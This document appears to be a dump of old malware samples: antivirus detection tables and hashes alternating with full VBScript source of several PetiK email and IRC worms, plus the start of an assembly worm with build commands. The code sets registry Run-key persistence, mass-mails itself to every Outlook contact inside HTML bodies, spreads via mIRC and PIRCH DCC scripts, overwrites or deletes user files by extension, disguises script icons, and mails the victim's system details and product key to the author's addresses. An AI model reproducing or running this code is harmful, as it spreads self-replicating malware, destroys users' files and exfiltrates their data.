DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom
eSafe 7.0.17.0 2009.05.14 VBS.Scramble.
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1
GData 19 2009.05.16 Generic.ScriptWorm.892F765D
K7AntiVirus 7.10.737 2009.05.16 -
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm
Panda 10.0.0.14 2009.05.16 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.K
Prevx 3.0 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
MD5...: af1121c899b152b95520214e4873e466
SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db
' Name : VBS.Kadosh
' Author : PetiK
' Language : VBS
' Date : 06/01/2001
' VBS/Kadosh.A par PandaKiller

' Ce fichier se copie dans le répertoire WINDOWS sous le nom de
' WINEXEC.EXE.VBS et dans le répertoire SYSTEM sous winRun.dll.vbs
' Il change la page de démarrage du WEB et met LIVE.MULTIMANIA.COM
' ATTENTION : Norton détècte ce programme comme le virus VBS.NewLove.A
' CE N'EST PAS UN VIRUS : IL NE DETRUIT RIEN
DEBUT()
Sub DEBUT()
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinExec.exe.vbs")
c.Copy(sys&"\WinRun.dll.vbs")
INTERNET()
EMAIL()
msgbox "Le tour du monde en 20 jours",vbinformation
End Sub
' MODIFIE LA PAGE DE DEMARRAGE D'INTERNET
Sub INTERNET()
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"live.multimania.com"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec",
"C:\WINDOWS\WinExec.exe.vbs"
End Sub
' ENVOIE UNE DE SES COPIE A TOUS LES DESTINATAIRE DU CARNET D'ADRESSE
Sub EMAIL()
Set K = CreateObject("Outlook.Application")
Set L = K.GetNameSpace("MAPI")
For Each M In L.AddressLists
If M.AddressEntries.Count <> 0 Then
Set N = K.CreateItem(0)
For O = 1 To M.AddressEntries.Count
Set P = M.AddressEntries(O)
If O = 1 Then
N.BCC = P.Address
Else
N.BCC = N.BCC & "; " & P.Address
End If
Next
N.Subject = "Le Tour du Monde"
N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite"
Set Q = CreateObject("Scripting.FileSystemObject")
N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs")
N.Send
End If
Next
End Sub
File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET)

AhnLab-V3 5.0.0.2 2009.05.11 -
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.05
Authentium 5.1.2.4 2009.05.10 VBS/Petik.W@mm
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.EDFACDDC
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.W
ClamAV 0.94.1 2009.05.11 -
DrWeb 5.0.0.12182 2009.05.11 WORM.Virus
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 VBS/Sodak
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.W@mm
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.M@mm
GData 19 2009.05.11 Generic.ScriptWorm.EDFACDDC
K7AntiVirus 7.10.729 2009.05.08 VBS.Generic.MassMailer
McAfee 5611 2009.05.10 VBS/Generic@MM
McAfee+Artemis 5611 2009.05.10 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.05
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.L
Norman 6.01.05 2009.05.08 VBS/Autorun.AP
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.D@mm
Panda 10.0.0.14 2009.05.10 -
PCTools 4.4.2.0 2009.05.07 VBS.Petik.L
Prevx 3.0 2009.05.11 -
Sophos 4.41.0 2009.05.11 VBS/Petik-L
Sunbelt 3.2.1858.2 2009.05.09 -
TheHacker 6.3.4.1.324 2009.05.09 -
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.L
MD5...: 763d1411edc603a60b7fdd2f63d77579
SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49
' Name : VBS.ShowVar
' Author : PetiK
' Language : VBS
' Date : 17/01/2001
' Copy itself to %WINDIR%\Showvar.vbs

' Add to registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run
' Showvar = %WINDIR%\Showvar.vbs
' Spread with MIRC by writing a script.
' Spread via PIRCH.
' Spread via mail :
' Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!"
' No file attached, the code of worm is directly int the HTML code of the mail.
It creats a VBS file into the WINDIR directory and run it.
' When day is 5th we can see a messagebox
'ShowVar par PetiK 21/01/2000

Dim fso,ws,file
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
DEBUT()
Sub DEBUT()
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
ShowVar = (win&"\Showvar.vbs")
c.Copy (ShowVar)
ws.RegWrite RUN,ShowVar
If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then
Mirc ""
End If
If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then
Pirch ""
End If
if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then
EMail()
End If
Divers()
End Sub
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1"
End If
End Function
Function Pirch(path)
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
SV3
Script.WriteLine ""
Script.WriteLine ""
Script.WriteLine ""
Script.WriteLine ""
Script.Close
End If
ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1"
End Function
Function EMail()
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et
accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux
erreurs.<br>Désolé !<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
ws.regwrite "HKCU\Software\ShowVar\MAIL", "1"
End Function
Function Divers()
If Day(Now()) = 5 Then
MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames"
End If
AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE
End Function
File ShowVar.vbs received on 05.16.2009 19:40:46 (CET)

a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Lee
AntiVir 7.9.0.168 2009.05.15 Worm/Lee.Based.2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.Lee-based
Authentium 5.1.2.4 2009.05.16 VBS/Pica.Q
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Level
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A5CDC117
CAT-QuickHeal 10.00 2009.05.15 VBS/Pica.Q
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 VBS.Petick.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.16 VBS/Pica.Q
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Lee-based
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E@mm
GData 19 2009.05.16 Generic.ScriptWorm.A5CDC117
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Lee-based
McAfee 5616 2009.05.15 MIRC/Generic
McAfee+Artemis 5616 2009.05.15 MIRC/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Lee.Based.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.E
NOD32 4080 2009.05.15 VBS/Pica.Q
Norman 6.01.05 2009.05.16 VBS/Lee-based.K
nProtect 2009.1.8.0 2009.05.16 VBS.Lee.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Petik.E
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Script Virus
Sophos 4.41.0 2009.05.16 Mal/VBSMail-A
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.E
MD5...: b4a5df075e6d5278036e07be004b3e09
SHA1..: e757ae3f2a165cdb1861c8c8743bd0f76c28d606
' Name : VBS/Outlook/mIrc/PIRCH/PetiK.A
' Author : PetiK
' Language : VBS
' Date : 30/01/2001
' Taille : 9766 octets

' Il se copie dans le dossier WINDIR sous le nom de PetiK.txt.vbs
' Pour cacher cela, il modifiera l'icône des .VBS en .TXT
' Il infecte ensuite mIRC. Il cherche le dossier par défaut où se trouve le fichier
' MIRC.INI. Si il le trouve, il crée à l'intérieur du dossier un fichier SCRIPT.INI
' Il infecte ensuite PIRCH de la même manière.
' Pour le logiciel Outlook, il va écrire son code à l'intérieur du message en VBScript
' De telle sorte que le virus s'active dès la lecture du message.
' Il envoie également différentes informations, à deux adresses :
' petik@caramail.com et ppetik@hotmail.com. Les informations sont :
' - Nom de l'utilisateur et de l'Organisation
' - Le nom de l'ordinateur
' - Le pays
' - La version et le numéro de WINDOWS
' - Le numéro d'identification
' - Le numéro d'enregistrement
' - La page de démarrage d'Internet Explorer
' - Le dossier de téléchargement
' - Le nom de dossier de WINDOWS, SYSTEM, TEMPORAIRE et de PROGRAM FILES
' Et envoie tous cela avec comme sujet :
' Message pour PetiK de XXX où XXX est le nom d'Utilisateur
' Le message envoyé aux autres personnes est :
' " Important Message From Micrsoft Corporation "
' Il infecte ensuite les fichiers en fonction de leur extension.
' VBS et VBE : écrit le code du virus à l'intérieur.
' JS et JSE : écrit le code et change l'extension : file.js => file.vbs
' EXE, INI, GIF, JPG et HTM : créer un nouveau fichier .VBS avec code du virus
' MP3, DOC, XLS, PPT et HLP : met l'attribut caché
'VBS/Outlook/mIrc/PIRCH/PetiK.A par PetiK

Dim fso,ws,file
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
DEBUT()
Sub DEBUT()
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
PetiK = (win&"\PetiK.txt.vbs")
c.Copy (PetiK)
ws.RegWrite RUN,PetiK
VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\")
TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\")
ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI
ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI
If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then
EMail()
End If
If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then
Mirc ""
End If
If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then
Pirch ""
End If
lecteur()
End Sub
Function EMail()
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this
message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent
errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Important Message From Microsoft Corporation"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Set msg2 = Outlook.CreateItem(0)
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead
("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet
Explorer\International\AcceptLanguage")
WINDIR = fso.GetSpecialFolder(0)
SYSDIR = fso.GetSpecialFolder(1)
TMPDIR = fso.GetSpecialFolder(2)
msg2.BCC = "petik@caramail.com;ppetik@hotmail.com"
msg2.Subject = "Message pour PetiK de " & NOM
m2 = "-Information :"
m2 = m2 & vbCrLf & "Date : " & date
m2 = m2 & vbCrLf & "Heure : " & time
m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName
m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT
m2 = m2 & vbCrLf & "PAYS : " & PAYS
m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM
m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1
m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2
m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM
m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR
m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR
m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR
m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR
m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD
msg2.Body = m2
msg2.DeleteAfterSubmit = True
msg2.Send
Outlook.Quit
End If
ws.RegWrite "HKLM\Software\PetiK\","OK"
End Function
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK"
End If
End Function
Function Pirch(path)
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir &
"\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine ""
Script.WriteLine "User1=*!*@*"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
PK3
Script.WriteLine ""
Script.WriteLine ""
Script.WriteLine ""
Script.WriteLine ""
Script.Close
End If
ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK"
End Function
Sub lecteur
dim f,f1,fc
Set dr = fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
Set f = fso.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe")
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
elseif (ext="js") or (ext="jse") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
bn=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.Copy(dossier&"\"&bn&".vbs")
fso.DeleteFile(f1.path)
elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then
Set cr = fso.CreateTextFile(f1.path&".vbs")
cr.Write vbscopie
cr.Close
fso.DeleteFile(f1.path)
elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
Next
End Sub
Sub liste(dossier)
Set f = fso.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File PetiK.vbs received on 05.16.2009 19:29:07 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Petik.A1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Pica.Q
AVG 8.5.0.336 2009.05.15 VBS/Level
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.C6E6F4BD
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.VBS.Email-Worm.Lee-based
DrWeb 5.0.0.12182 2009.05.16 SCRIPT.WORM.Virus
eSafe 7.0.17.0 2009.05.14 VBS.Smile.
F-Prot 4.4.4.56 2009.05.16 VBS/Pica.Q
Fortinet 3.117.0.0 2009.05.16 VBS/LeeBased.E@mm
GData 19 2009.05.16 Generic.ScriptWorm.C6E6F4BD
K7AntiVirus 7.10.737 2009.05.16 -
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.A1
Microsoft 1.4602 2009.05.16 Worm:VBS/LoveLetter.gen
Norman 6.01.05 2009.05.16 VBS/Lee-based.F
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.F@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Script Virus
Sophos 4.41.0 2009.05.16 VBS/VBSWG-2B
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.A@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.F
VBA32 3.12.10.5 2009.05.16 IRC-Worm.IRC.Generic
ViRobot 2009.5.15.1737 2009.05.15 VBS.Petik.F
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F
MD5...: c9103a19fecc9f28dda136a81899d2fe
SHA1..: e06a3a4da1ce93f9005977877c85733a057da4e0
comment $ 04/02/2001 => 07/02/2001
DESCRIPTION:
S'enregistre comme "Service Process" c'est à dir qu'il n'est pas visible dans
la liste des tâches (CTRL+ALT+SUPR).
Se copie ensuite dans le dossier SYSTEM sous le nom ie042601.exe : %SysDir%\ie042601.exe
Et s'ebregistre dans le fichier WIN.INI :
[windows]
run=%SysDir%\ie042601.exe (où %SysDir% est le nom par défaut du dossier SYSTEM)
Crée le fichier SCRIPT.INI dans C:\ puis va le copier dans C:\MIRC et C:\MIRC32 puis
efface
l'original dans C:\
Crée EMAIL.VBS dans le répertoire %WinDir% en "lecture seule".
Crée WSOCK32.BAT et C:\WIN.DRV dans %WinDir% en "fichier caché".
Le programme essaie ensuite de se procurer l'adresse IP du site francophone de yahoo
(www.yahoo.fr).
Si il y arrive, il éxécute WSOCK32.BAT :
- Exécution de EMail.vbs = Envoir du programme à tous les destinataires du carnet
d'adresses.
- Téléchargement de petik.bmp dans C:\
Modification du papier peint avec l'image "petik.bmp".
Tous les fichiers BMP dur répertoire WINDOWS auront l'attribut caché.
POUR COMPILER:
tasm32 /M /ML ie042601.asm
tlink32 -Tpe -x -aa ie042601.obj,,,import32 $
.386
jumps
locals
;KERNEL32.dll
extrn lstrcat:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetCurrentProcessId:PROC
extrn RegisterServiceProcess:PROC
extrn SetCurrentDirectoryA:PROC
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
;ADVAPI32.dll
extrn RegOpenKeyExA:PROC
;WSOCK32.dll
extrn gethostbyname:PROC
;USER32.dll
extrn SystemParametersInfoA:PROC
.data
szBAT db 260 dup (0)
szInfo db 260 dup (0)
szVBS db 260 dup (0)
szWinini db 260 dup (0)
DIR db 260 dup (0)
FileHandle dd ?
RegHandle dd ?
SearchHandle dd ?
octets dd ?
Copie db "\ie042601.exe",00h
batfile db "\wsock32.bat",00h
vbsfile db "\EMail.vbs",00h
bmpfile db "C:\petik.bmp",00h
drvfile db "C:\Win.drv",00h
inifile db "C:\script.ini",00h
run db "run",00h
yahoo db "http://www.yahoo.fr",00h
SOUS_CLE db "Control Panel\Desktop",00h
TWP_D db "TileWallpaper",00h
TWP_S db "0",00h
WPS_D db "WallpaperStyle",00h
WPS_S db "2",00h
FICHIER db "*.bmp",00h
